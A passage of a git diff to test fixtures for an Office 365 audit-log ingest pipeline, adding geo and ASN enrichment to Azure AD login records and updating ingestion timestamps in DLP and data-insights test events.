rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d137a5e4-7004-493a-acca-5fb167d1f207\",\"InterSystemsId\":\"cf2168a1-6537-4ed6-80a5-797c3458180c\",\"IntraSystemId\":\"23f53edd-63a7-4292-9d80-4fbc49c11e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -7490,6 +8246,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -7570,7 +8338,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970400300Z", + "ingested": "2021-12-14T14:49:08.047452221Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:20\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"73f0a2ef-35be-4a71-9545-59d879fc8fb2\",\"InterSystemsId\":\"d21f6867-0670-4c94-b6fa-bde326fcf3c6\",\"IntraSystemId\":\"1fa4819f-605a-4ebe-a2c3-bc11c3f8e200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -7610,6 +8378,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -7690,7 +8470,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970406Z", + "ingested": "2021-12-14T14:49:08.047452791Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3783acda-5ded-4d69-95b6-3df5344c0ce0\",\"InterSystemsId\":\"d5effb7f-9d39-4893-90f6-9cfeec7ed1a7\",\"IntraSystemId\":\"f22a3ad7-22e7-4296-a600-e4e9161a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -7730,6 +8510,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -7810,7 +8602,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970433700Z", + "ingested": "2021-12-14T14:49:08.047453251Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:03\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"f67568b1-64c4-4165-bdd9-16a5b9142eef\",\"InterSystemsId\":\"d960e058-1adb-4a84-a65b-1a6ce367e323\",\"IntraSystemId\":\"1dfdb693-18a1-4cff-aa3e-61feaa356100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -7850,6 +8642,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -7930,7 +8734,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970437800Z", + "ingested": "2021-12-14T14:49:08.047453712Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a8114a24-d342-4689-b75e-51e6386763de\",\"InterSystemsId\":\"e2565aaf-91b0-4ccd-8810-743123eb7383\",\"IntraSystemId\":\"21166e08-6589-4c2d-a325-c97ba45f2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -7970,6 +8774,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -8050,7 +8866,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970442700Z", + "ingested": "2021-12-14T14:49:08.047454193Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"1eaf9c65-8c67-4cd9-9277-771589113752\",\"InterSystemsId\":\"ede626b9-2035-4d02-8330-201c4ae82af6\",\"IntraSystemId\":\"98612804-9aa6-40a4-b72a-808bc7742000\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -8090,6 +8906,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -8170,7 +8998,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970447700Z", + "ingested": "2021-12-14T14:49:08.047454644Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:39\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3c439e46-d454-4767-9320-1e75540821b7\",\"InterSystemsId\":\"fc5c6c90-a6ba-486c-b685-8d67c529d3aa\",\"IntraSystemId\":\"6e184f6f-887b-4410-b24d-723031366000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-data-insights-api-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-data-insights-api-events.json-expected.json index a4d621ba4f6..326972161ad 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-data-insights-api-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-data-insights-api-events.json-expected.json @@ -25,7 +25,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698290600Z", + "ingested": "2021-12-14T14:49:25.957824969Z", "original": "{\"CreationTime\":\"2020-02-10T15:13:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"20a7bbcf-8e64-4e60-b075-08d7ae3bcea0\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -72,7 +72,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698300600Z", + "ingested": "2021-12-14T14:49:25.957827435Z", "original": "{\"CreationTime\":\"2020-02-12T21:38:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"0ff67168-de8c-45fb-3f7d-08d7b003ebdc\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -119,7 +119,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698306900Z", + "ingested": "2021-12-14T14:49:25.957828019Z", "original": "{\"CreationTime\":\"2020-02-10T15:13:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"20a7bbcf-8e64-4e60-b075-08d7ae3bcea0\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -166,7 +166,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698312900Z", + "ingested": "2021-12-14T14:49:25.957828434Z", "original": "{\"CreationTime\":\"2020-02-12T10:53:26\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"3b492d08-23a8-4e65-75ea-08d7afa9c9a2\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -213,7 +213,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698318900Z", + "ingested": "2021-12-14T14:49:25.957828848Z", "original": "{\"CreationTime\":\"2020-02-12T21:38:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"0ff67168-de8c-45fb-3f7d-08d7b003ebdc\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -260,7 +260,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698324800Z", + "ingested": "2021-12-14T14:49:25.957829277Z", "original": "{\"CreationTime\":\"2020-02-12T10:53:26\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"3b492d08-23a8-4e65-75ea-08d7afa9c9a2\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -307,7 +307,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698330800Z", + "ingested": "2021-12-14T14:49:25.957829687Z", "original": "{\"CreationTime\":\"2020-02-10T15:13:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"20a7bbcf-8e64-4e60-b075-08d7ae3bcea0\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -354,7 +354,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698336700Z", + "ingested": "2021-12-14T14:49:25.957830158Z", "original": "{\"CreationTime\":\"2020-02-12T10:53:26\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"3b492d08-23a8-4e65-75ea-08d7afa9c9a2\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -401,7 +401,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:28.698342600Z", + "ingested": "2021-12-14T14:49:25.957830574Z", "original": "{\"CreationTime\":\"2020-02-12T21:38:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"0ff67168-de8c-45fb-3f7d-08d7b003ebdc\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-exchange-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-exchange-events.json-expected.json index 410b3afce36..614e427c631 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-exchange-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-exchange-events.json-expected.json @@ -151,7 +151,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.292337500Z", + "ingested": "2021-12-14T14:49:26.527166391Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13405,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"d5a0e7d9-e06f-498c-8413-eb83b7dbd516\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-e159-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected test\",\"Severity\":\"High\"},{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-1234-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"Mid volume of content detected test\",\"Severity\":\"Medium\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", @@ -323,7 +323,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.292347200Z", + "ingested": "2021-12-14T14:49:26.527201058Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13405,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"d5a0e7d9-e06f-498c-8413-eb83b7dbd516\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleUndo\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-e159-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected test\",\"Severity\":\"High\"},{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message 